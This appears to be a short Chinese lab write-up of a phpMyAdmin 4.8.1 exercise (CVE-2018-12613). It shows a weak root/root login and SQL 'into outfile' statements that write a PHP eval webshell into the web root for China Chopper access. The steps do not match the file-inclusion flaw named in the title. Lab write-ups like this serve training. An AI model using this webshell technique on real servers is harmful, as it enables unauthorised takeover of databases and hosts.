墨者学院_phpMyAdmin后台文件包含分析溯源

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,
通过二次编码即可绕过检查,造成远程文件包含漏洞。
受影响版本:
phpMyAdmin 4.8.0和4.8.1受到影响
前台可以使用弱口令直接登录
1.打开靶场,看见登录窗口,使用弱口令登录(root,root)

2.在mysql下使用:select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php”
这里的hack是菜刀连接时候需要的口令
菜刀使用的链接是:http://219.153.49.228:48959/3.php
包含session文件。本次使用/tmp/sess_sessionid
在数据库窗口写入:
select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php” --> 这句是可以和菜刀连接的
select “<?php phpinfo();?>” into outfile “/var/www/html/3.php” --> 这句是在浏览器可以看到的

本文介绍了phpMyAdmin 4.8.1版本中的一个远程文件包含漏洞(CVE-2018-12613),详细解析了利用过程。内容包括如何通过弱口令登录,使用SQL注入创建恶意PHP文件,并通过菜刀进行远程控制。此外,还展示了如何利用该漏洞执行PHP代码,如显示系统信息。
最低0.47元/天 解锁文章
651

被折叠的 条评论
为什么被折叠?



